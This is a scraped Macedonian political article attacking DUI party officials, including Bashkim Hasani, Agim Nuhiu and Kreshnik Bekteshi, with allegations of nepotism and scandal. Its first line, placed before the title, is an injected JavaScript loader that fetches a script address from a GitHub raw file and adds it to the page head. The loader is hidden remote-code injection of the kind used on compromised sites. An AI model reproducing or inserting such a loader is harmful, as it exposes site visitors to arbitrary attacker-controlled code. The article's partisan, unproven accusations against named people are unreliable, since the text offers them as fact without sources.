;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Чесните кадри на ДУИ - Антропол
АктуелноЛокално

Чесните кадри на ДУИ

Накратко околу некои од чесните кадри на чесната влада за кои многу од медиумите кои одработуваат за истата молчат.

Новиот заменик министер за одбрана – Башким Хасани е познат во јавноста по скандалот со неговиот брат Фитим Хасани, кој е полициски инспектор во Гостивар. Односно, минатата година изби скандал дека возилото на инспекторот Фитим Хасани служело за безбеден транспорт на кокаин низ Македонија во организација на дилерот од Пирок , Хазир Јакупи. Дали некои од медиумите објавија дека брат му на Башким Хасани, кој е нов заменик министер на Шеќеринска, се’ уште е инспектор во МВР, бидејки предметот му го држи во фиока Оливер Спасовски? Истиот Башким Хасани по професија е професор по физичко воспитување и со ова образование, тој досега бил заменик-директор на Финансиска полиција.

Новиот заменик – министер за правда, Агим Нухиу е познат по скандалот со незаконското унапредување на Тетовскиот универзитет, заедно со Арбер Адеми и Сафет Емрули. Дополнително, инспекторот Илиевски тогаш обзнани дека директно трпел притисоци од Нухиу, за што реагираа и од политичката партија Левица.

Крешник Бектеши како министер за економија и во претходната влада, тогаш си ја вработи сестрата Влора Бектеши во МЕПСО. Таа е вработена кон крајот на 2018 година,а на почетокот на 2019 година, токму тој воведува повисоки давачки за пазарџиите, давачки кои ќе завршат во државниот буџет од каде пак се делат плати за јавната администрација каде што работи неговата сестра. Само да напоменеме дека ова не е единствен пример на непотизам и партизација изминативе години каде имаше десетици примери за роднини на државни функционери кои се вработија во државни компании.

И самата албанска јавност реагираше за предлогот Фатмир Бесими од ДУИ да го води министерството за финансии затоа што во редовите на новиот парламентарен состав пратеник од редовите на истата партија е негов брат. Ова во суштина зборува за непотизмот кој ја контролира и самата партија ДУИ изминатите 20 години.

Некои од кадрите на чеснава влада не го познаваат македонскиот јазик, а ја водат државата. Еден од нив е и Насер Нуредини, министерот за животна средина и просторно планирање, кој покрај тоа што не го познава македонскиот јазик и нема никакви резултати во држава со најзагаден воздух, се дрзна да им каже на новинарите и дека и тие можеле да научат албански јазик. Следно можеби ќе биде шамарење од Груби ако не знаат.